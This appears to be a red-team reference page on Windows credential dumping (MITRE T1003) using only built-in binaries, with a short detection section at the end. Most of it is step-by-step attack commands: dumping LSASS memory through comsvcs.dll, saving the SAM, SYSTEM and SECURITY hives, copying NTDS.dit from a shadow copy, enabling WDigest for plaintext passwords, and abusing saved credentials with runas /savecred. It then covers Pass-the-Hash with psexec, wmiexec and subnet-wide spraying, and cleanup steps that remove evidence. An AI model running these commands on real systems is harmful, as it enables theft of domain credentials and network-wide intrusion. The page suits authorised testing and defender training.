T1003: OS Credential Dumping (LOL Methods)
Technique Requirementsβ
| Privileges Required | Administrator (SAM/SECURITY hives) / SYSTEM or SeDebugPrivilege (LSASS) |
| Effective Permissions | Credentials of all locally authenticated users / service accounts |
| Triggered By | Manual execution |
| Employment Complexity | 2/5 - Low |
| Detection Complexity | 2/5 - Low |
Backgroundβ
After obtaining an elevated session, credential dumping is the highest-value immediate action available to an operator. Credentials harvested from one system unlock lateral movement to every other system where those accounts are reused - domain accounts in particular can propagate access across the entire environment.
This technique covers LOL-only methods: no Mimikatz binary, no custom tools. Everything runs using signed Windows binaries already present on every system.
What Credentials Live Whereβ
| Source | What You Get | Privileges Needed |
|---|---|---|
| LSASS memory | NTLM hashes + plaintext passwords (if WDigest enabled) for all interactively logged-on users, including domain accounts | SYSTEM or SeDebugPrivilege |
| SAM hive | NTLM hashes for all local accounts | Administrator |
| SYSTEM hive | Boot key (required to decrypt SAM) | Administrator |
| SECURITY hive | LSA secrets: service account credentials, cached domain logon hashes (DCC2), machine account hash | Administrator |
| NTDS.dit | All domain account hashes (Domain Controller only) | SYSTEM on DC |
LSASS is the primary target in most engagements because it holds domain account credentials in memory - domain hashes (and sometimes plaintext) enable Pass-the-Hash and Pass-the-Ticket attacks across the environment. SAM + SYSTEM covers local accounts and is useful when domain credentials aren't present or when you need the local Administrator hash for lateral movement via Pass-the-Hash.
WDigest and Plaintext Passwordsβ
On older Windows systems (pre-Windows 8.1 / Server 2012 R2), WDigest authentication was enabled by default, causing Windows to cache plaintext passwords in LSASS memory alongside NTLM hashes. On modern systems WDigest is disabled by default, but the registry setting can be changed by an attacker (or may have been re-enabled by legacy software):
# Check WDigest status (1 = enabled = plaintext in LSASS)
reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential
# Enable WDigest to capture plaintext on next logon
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
Enabling WDigest only affects credentials cached after the change - existing LSASS contents are not upgraded to plaintext. A user must log on (or lock/unlock) after the change for their plaintext to appear. Only enable this if you are willing to wait for the next logon event.
Proceduresβ
Method 1: LSASS MiniDump via comsvcs.dll (T1003.001)β
Requires: SYSTEM or SeDebugPrivilege
LOL binaries used: rundll32.exe, tasklist.exe
comsvcs.dll is a legitimate Windows COM+ Services DLL that ships with every Windows install. It exports a MiniDump function normally used for crash diagnostics. When called via rundll32, it produces a full memory dump of a target process - including LSASS.
The dump file is not immediately readable, but can be parsed offline on your Kali VM to extract hashes.
-
Find the LSASS PID:
tasklist /FI "IMAGENAME eq lsass.exe"Get-Process lsass | Select Id -
Dump LSASS to disk using
comsvcs.dll:rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <LSASS_PID> C:\Windows\Temp\lsass.dmp full$lsassPid = (Get-Process lsass).Id
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump $lsassPid C:\Windows\Temp\lsass.dmp fullStorage path: Write the dump to a location you can later download from -
C:\Windows\Temp\works well. The dump file will be ~30β100 MB depending on system uptime and loaded credentials. -
Download the dump to your Kali VM: From your Meterpreter session or another download mechanism:
meterpreter > download C:\Windows\Temp\lsass.dmp /tmp/lsass.dmpOr using PowerShell from your attack host:
# Serve from victim via SMB or use your existing file transfer method -
Parse the dump on Kali using
pypykatz(pre-installed on Kali):pypykatz lsa minidump /tmp/lsass.dmpExtract just NTLM hashes for use in Pass-the-Hash:
pypykatz lsa minidump /tmp/lsass.dmp | grep -E "Username|NT:|Password" | grep -v "None"tippypykatzoutput includes the MSV (NTLM), Kerberos, WDigest, DPAPI, and LiveSSP credential providers. Look forNT:lines for NTLM hashes. If WDigest was enabled,Password:lines will contain plaintext.
Method 2: SAM + SYSTEM + SECURITY Hive Export via reg.exe (T1003.002 / T1003.004)β
Requires: Administrator
LOL binaries used: reg.exe
The SAM (Security Account Manager) database holds NTLM hashes for all local accounts. It is encrypted at rest with a boot key derived from the SYSTEM hive. The SECURITY hive contains LSA secrets: credentials for services running as domain accounts, and cached domain logon hashes (DCC2) for users who have previously logged on.
All three hives must be exported together - SAM alone is encrypted and unreadable without the SYSTEM boot key.
-
Export the three hives:
reg save HKLM\SAM C:\Windows\Temp\sam.hive
reg save HKLM\SYSTEM C:\Windows\Temp\system.hive
reg save HKLM\SECURITY C:\Windows\Temp\security.hive -
Download the hive files to Kali:
meterpreter > download C:\Windows\Temp\sam.hive /tmp/sam.hive
meterpreter > download C:\Windows\Temp\system.hive /tmp/system.hive
meterpreter > download C:\Windows\Temp\security.hive /tmp/security.hive -
Parse offline on Kali using
impacket-secretsdump:impacket-secretsdump -sam /tmp/sam.hive -system /tmp/system.hive -security /tmp/security.hive LOCALExample output:
[*] Target system bootKey: 0x3b3b1234...
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash):
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup$:1001:aad3b435b51404eeaad3b435b51404ee:a87f3a337d73085c45f9416be5787d86:::
[*] Dumping cached domain logon information (domain/username:hash):
DOMAIN/jsmith:$DCC2$10240#jsmith#a4b5c6...
[*] Dumping LSA Secrets:
[*] $MACHINE.ACC
...The output format is
username:RID:LM_hash:NT_hash. The NT hash (last field) is what you use for Pass-the-Hash. -
Clean up the hive files from the victim:
del C:\Windows\Temp\sam.hive C:\Windows\Temp\system.hive C:\Windows\Temp\security.hive
Method 3: Shadow Copy + NTDS.dit (T1003.003 - Domain Controllers only)β
Requires: SYSTEM on a Domain Controller
LOL binaries used: vssadmin.exe, cmd.exe
On a Domain Controller, all domain account hashes live in NTDS.dit. This file is locked while the DC is running, but a shadow copy can be used to access it without stopping the NTDS service.
-
Create a shadow copy:
vssadmin create shadow /for=C:Note the shadow copy device path from the output (e.g.,
\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1). -
Copy NTDS.dit and the SYSTEM hive from the shadow copy:
copy "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit" C:\Windows\Temp\ntds.dit
copy "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM" C:\Windows\Temp\system.hive -
Download both files to Kali and parse offline:
impacket-secretsdump -ntds /tmp/ntds.dit -system /tmp/system.hive LOCALThis dumps every domain account hash in the environment - all user accounts, service accounts, and computer accounts.
-
Delete the shadow copy when done to reduce evidence:
vssadmin delete shadows /shadow=<SHADOW_ID> /quiet
Method 4: Windows Credential Manager β cmdkey + runas /savecred (T1555.004)β
Requires: User
LOL binaries used: cmdkey.exe, runas.exe
The Windows Credential Manager stores saved credentials (usernames + passwords) for network resources, websites, and remote sessions. These are credentials the user chose to save β "remember my password" prompts from RDP, mapped drives, and web browsers (legacy IE/Edge). They are often stale but frequently contain domain credentials.
cmdkey.exe lists and manages credentials. runas /savecred reuses a saved credential to run a command as another user β if a credential for a domain admin account exists in the store, you can use it to execute arbitrary commands as that user with no password prompt.
-
Enumerate saved credentials:
cmdkey /listExample output:
Currently stored credentials:
Target: Domain:target=CORP\jdoe
Type: Domain Password
User: CORP\jdoe
Target: MicrosoftOffice16_Data:SSPI:user@corp.local
Type: Generic
User: user@corp.local
Target: TERMSRV/192.168.1.10
Type: Domain Password
User: CORP\administratorKey targets:
TERMSRV/entries β saved RDP credentials, often domain admin accountsDomain:target=CORP\entries β saved domain account credentialsMicrosoftOffice/OneDriveβ often contain O365/Azure AD credentials
-
Use a saved credential to run a command (no password prompt):
If a useful credential exists (e.g.,
CORP\administratorstored for an RDP target):runas /savecred /user:CORP\administrator "cmd.exe /c whoami > C:\Windows\Temp\id.txt"# Open an interactive shell as the saved user:
runas /savecred /user:CORP\administrator cmd.exenoterunas /savecredonly works if the credential is already in the store for that exact username. The/savecredflag tellsrunasto look up the saved password rather than prompting. If no matching credential exists, the command fails with "The credentials supplied to the package were not recognized." -
Implant a credential for later use (if you know a password you want to persist):
cmdkey /add:<TARGET_OR_DOMAIN> /user:<DOMAIN>\<USERNAME> /pass:<PASSWORD>Example β store domain admin credentials for later
runas /savecreduse:cmdkey /add:CORP /user:CORP\administrator /pass:Summer2024!
runas /savecred /user:CORP\administrator "powershell -nop -w 1 -c <PS_CRADLE>" -
Lateral movement via saved RDP credential:
If
TERMSRV/<IP>is in the store,mstscwill connect without prompting for credentials β or userunas /savecredto execute a payload on the remote host via the saved credentials:# Spawn a shell as the stored RDP user, then use that context for lateral movement
runas /savecred /user:CORP\administrator "powershell -nop -w 1 -c <PS_CRADLE>" -
Cleanup (remove the implanted credential):
cmdkey /delete:CORP
cmdkey /delete:TERMSRV/<TARGET_IP>
What to Expectβ
From LSASS (pypykatz output):
== LogonSession ==
authentication_id 123456 (1e240)
session_id 1
username jsmith
domainname CORP
logon_server DC01
logon_time 2026-03-21T08:00:00.000000+00:00
sid S-1-5-21-...
== MSV ==
Username: jsmith
Domain: CORP
NT: 8f4b5c2e1a3d... <-- NTLM hash for Pass-the-Hash
== WDIGEST [optional if enabled] ==
Username: jsmith
Password: Summer2024! <-- Plaintext if WDigest enabled
From SAM (secretsdump output):
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
Using the hashes for lateral movement:
Pass-the-Hash with impacket tools on Kali (no cracking required):
# Open an interactive shell on a remote host as Administrator using only the hash
impacket-psexec -hashes :8846f7eaee8fb117ad06bdd830b7586c Administrator@<TARGET_IP>
# Or WMI-based execution:
impacket-wmiexec -hashes :8846f7eaee8fb117ad06bdd830b7586c Administrator@<TARGET_IP>
# Or SMB/secretsdump against remote target (to pull more creds from another box):
impacket-secretsdump -hashes :8846f7eaee8fb117ad06bdd830b7586c Administrator@<TARGET_IP>
Pass-the-Hash with CrackMapExec for network-wide spraying:
crackmapexec smb <SUBNET>/24 -u Administrator -H 8846f7eaee8fb117ad06bdd830b7586c
The built-in local Administrator account (RID 500) is particularly valuable for PTH because it is exempt from UAC remote restrictions that affect other admin accounts. A hash for the local Administrator account often works against multiple machines in the environment if the organization uses a common local admin password (very common).
Log Detectionβ
- Source:
Microsoft-Windows-Sysmon/Operational- EventID:
10(ProcessAccess)- Contains source/target process - look for any process opening
lsass.exewithPROCESS_VM_READaccess rights;rundll32.exeβlsass.exeis a strong indicator
- Contains source/target process - look for any process opening
- EventID:
1(ProcessCreate)rundll32.exeexecutingcomsvcs.dllwithMiniDumpargumentreg.exe save HKLM\SAMorreg.exe save HKLM\SYSTEM
- EventID:
11(FileCreate).dmpfile created in temp directories.hivefiles created in writable locations
- EventID:
- Source:
Security- EventID:
4656/4663(Object access)- Access to
HKLM\SAMorHKLM\SECURITYregistry hives
- Access to
- EventID:
4688(Process creation with command line auditing)rundll32.exewithcomsvcs.dllandMiniDumpin arguments
- EventID:
- Source:
Microsoft-Windows-NTLM/Operational- EventID:
4(NTLM authentication attempt)- Pass-the-Hash produces NTLM type 3 messages without a prior Kerberos exchange - look for NTLM auth from unexpected source hosts
- EventID: